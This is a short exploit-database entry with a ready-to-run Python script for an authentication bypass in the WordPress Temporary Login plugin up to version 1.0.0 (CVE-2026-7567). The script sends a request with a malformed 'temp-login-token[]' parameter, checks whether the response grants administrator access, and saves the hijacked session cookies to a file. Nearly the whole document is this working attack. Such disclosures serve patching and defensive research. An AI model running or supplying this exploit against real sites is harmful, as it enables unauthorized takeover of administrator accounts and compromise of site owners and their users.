# Exploit Title: Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
#  Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass   #
#                   BY: Amir Hossein Jamshidi                                   #
#               Mail: amirhosseinjamshidi64@gmail.com                           #
#           github: https://github.com/amirhosseinjamshidi64                    #
#                    Usage: python Exploit.py                                   #
#################################################################################
''')

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
    print("[✓] SUCCESS! Authentication bypassed!")
    print("[✓] WordPress logged-in cookie found")
    # Try to access admin area with the same session
    admin_check = requests.get(
        response.url.replace('wp-login.php', 'wp-admin/'),
        cookies=response.cookies
    )
    if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
        print("[✓] Full admin access confirmed!")
        print("[✓] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print("    - Plugin not installed or not version 1.0.0")
    print("    - No temporary users exist")
    print("    - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
    for cookie in response.cookies:
        f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")